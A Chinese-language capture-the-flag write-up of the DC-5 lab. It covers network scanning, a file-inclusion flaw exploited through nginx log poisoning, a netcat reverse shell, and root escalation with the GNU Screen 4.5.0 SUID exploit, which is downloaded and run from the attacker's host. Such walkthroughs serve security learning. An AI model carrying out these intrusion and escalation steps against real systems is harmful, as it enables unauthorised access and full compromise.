目录
前期准备
攻击机: kali windows11
靶机:DC-5 (调至NAT模式)
一、信息收集
1.IP地址收集
┌──(root㉿kali)-[~]
└─# arp-scan -l
通过比对MAC地址,发现靶机IP地址为 192.168.105.163
2.端口信息收集
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.105.163
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 11:28 CST
Nmap scan report for 192.168.105.163 (192.168.105.163)
Host is up (0.00079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
45985/tcp open status 1 (RPC #100024)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.10 seconds
看到有三个端口 80(http_open)111(rpcbind_open) 45985(status_open)
rpcbind服务: 允许网络上的不同程序调用远程主机上的程序或服务
这里的111端口应该有用,等用到了再看
3.网页信息收集
服务器信息为: Nginx 1.6.2
查看80网页端口
前面几个都是纯文本,到Contact可以写些东西,在探测网页功能的同时用dirsearch扫目录(最后扫出来了footer.php和thankyou.php)
关于Contact的框,没能试出什么,看一下footer.php
但是当我继续加载footer.php时,发现此时的日期会变
这个日期为什么会变?重复试了几次,只会在2017-2020的范围内变, 并且没有啥规律。。
再看看此时的thankyou.php
文件包含漏洞
发现出现了和footer.php一样的内容,此时先不管日期为什么会变了,这很明显有文件包含在里面,算是找到了一个突破口,尝试使用file参数来访问文件(其实这里的参数可能是需要用字典爆破的,但一般都是这个)
发现文件包含成功! 但这里看起来并没有用户给我们用,想想如何getshell?由于这里是文件包含,如果我能够包含到一个能弹shell的文件就好了,这个文件从哪来呢?应该就是要靠自己写进去了,但是写进去,会写到哪个文件?这里利用的是日志文件: /var/log/nginx/error.log(路径是通过Nginx版本查到的)
getshell
使用burpsuite抓包
点击send就可以看到此时的错误信息,现在再重启一个抓包,输入
此时再发送一下抓的第一个包,可以看到
直接使用蚁剑连接
成功getshell!
反弹shell
首先在kali中:
──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
然后在蚁剑虚拟终端:
此时就成功弹shell了,然后在kali中调起交互式终端
python -c "import pty;pty.spawn('/bin/bash')"提权
现在开始想想如何提权(这里已经用不了sudo -l了 找不到该命令)
www-data@dc-5:/var/backups$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
很多都没有接触过,那就直接问AI:“哪个存在SUID提权漏洞”
漏洞详情:
screen4.5.0 版本存在严重的 SUID 提权漏洞(CVE - 2017 - 5618)。此漏洞源于screen在 setuid 环境下运行时,对用户提供的环境变量处理不当。攻击者能够通过构造恶意的环境变量,利用这个漏洞在目标系统上以screen二进制文件所有者(通常是root)的权限执行任意代码,进而实现提权。
漏洞风险:在某些配置不当或存在旧版本漏洞的情况下,
ssh - keysign可能被利用来提权。ssh - keysign是 OpenSSH 中用于签署 SSH 密钥的程序,通常以root权限运行。若存在漏洞,攻击者可通过它以root权限执行恶意操作。不过,现代 OpenSSH 版本已经修复了已知的严重安全问题。
可以看的出来,提权点应该就在screen 4.5.0上了,直接在kali上搜索screen 4.5.0漏洞
┌──(root㉿kali)-[~]
└─# searchsploit screen 4.5.0
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41152.txt
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
---------------------------------------------- ---------------------------------
Shellcodes: No Results
先来试试第一个
┌──(root㉿kali)-[~]
└─# searchsploit -p 41152.txt
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
URL: https://www.exploit-db.com/exploits/41152
Path: /usr/share/exploitdb/exploits/linux/local/41152.txt
Codes: N/A
Verified: True
File Type: ASCII text
访问URL ,但没能看到什么,再看看下面那个41154,sh
┌──(root㉿kali)-[~]
└─# searchsploit -p 41154.sh
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
访问这个URL:GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit
可以看到该文件的内容,现在尝试直接把 41154.sh 文件下载下来,这里我尝试直接将sh下载到靶机中,复制下载链接进行下载,但是显示下载失败,权限不足,无法写入
wget https://www.exploit-db.com/download/41154
converted 'https://www.exploit-db.com/download/41154' (ANSI_X3.4-1968) -> 'https://www.exploit-db.com/download/41154' (UTF-8)
--2025-02-11 08:50:30-- https://www.exploit-db.com/download/41154
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1192 (1.2K) [application/txt]
41154: Permission denied
Cannot write to '41154' (Permission denied).
可能只是这个目录无法写入,找找可以写入的目录
find / -writable
发现/tmp目录可写,切换目录,再次下载EXP
www-data@dc-5:/tmp$ wget https://www.exploit-db.com/download/41154
wget https://www.exploit-db.com/download/41154
converted 'https://www.exploit-db.com/download/41154' (ANSI_X3.4-1968) -> 'https://www.exploit-db.com/download/41154' (UTF-8)
--2025-02-11 09:16:11-- https://www.exploit-db.com/download/41154
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1192 (1.2K) [application/txt]
Saving to: '41154'
41154 100%[=====================>] 1.16K --.-KB/s in 0s
2025-02-11 09:16:12 (30.6 MB/s) - '41154' saved [1192/1192]
成功下好,此时运行
www-data@dc-5:/tmp$ ./41154
./41154
bash: ./41154: Permission denied
显示还是没权限,赋权试试
www-data@dc-5:/tmp$ chmod 777 41154
chmod 777 41154
www-data@dc-5:/tmp$ ls -l
ls -l
total 8
-rwxrwxrwx 1 www-data www-data 1192 Feb 11 09:20 41154
然后再运行
www-data@dc-5:/tmp$ ./41154
./41154
bash: ./41154: /bin/bash^M: bad interpreter: No such file or directory
错误原因
换行符格式不兼容
在不同的操作系统中,文本文件使用的换行符格式有所不同:
- Windows 系统:使用
CRLF(回车符\r,ASCII 码为 0x0D;换行符\n,ASCII 码为 0x0A)作为换行符。- Unix/Linux 系统:使用
LF(换行符\n)作为换行符。
看来是windows和Linux之间的兼容性问题了,也许我应该用searchsploit在kali上下好文件,再导到靶机上来,这样应该就不存在兼容性问题了
首先在kali下好41154.sh
┌──(root㉿kali)-[/tmp]
└─# searchsploit -m 41154.sh
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /tmp/41154.sh
此时要把该文件传到靶机上,可以先开启http服务
┌──(root㉿kali)-[/tmp]
└─# python -m http.server 85
Serving HTTP on 0.0.0.0 port 85 (http://0.0.0.0:85/) ...
此时在靶机上下载kali机上的文件
www-data@dc-5:/tmp$ wget http://192.168.105.148:85/41154.sh
wget http://192.168.105.148:85/41154.sh
converted 'http://192.168.105.148:85/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.105.148:85/41154.sh' (UTF-8)
--2025-02-11 21:45:49-- http://192.168.105.148:85/41154.sh
Connecting to 192.168.105.148:85... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'
41154.sh 100%[=====================>] 1.12K --.-KB/s in 0s
2025-02-11 21:45:49 (264 MB/s) - '41154.sh' saved [1149/1149]
成功下载完,然后给其执行的权限
www-data@dc-5:/tmp$ chmod 777 41154.sh
chmod 777 41154.sh
再运行就发现有root权限了!
www-data@dc-5:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/usr/bin/ld: cannot open output file /tmp/rootshell: Permission denied
collect2: error: ld returned 1 exit status
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
# whoami
whoami
root
最终在/root下找到flag
# cat thisistheflag.txt
cat thisistheflag.txt
888b 888 d8b 888 88 8 888 888
8888b 888 Y8P 888 88 8 888 888
88888b 888 888 88 8 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 88 8 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 88 8 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8 P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 88 8 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
总结
(1)本次学习到的比较新奇的点就是利用文件包含漏洞来getshell
(2)然后对于问题解决的思路还是需要打开一些
扫一扫
2264
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
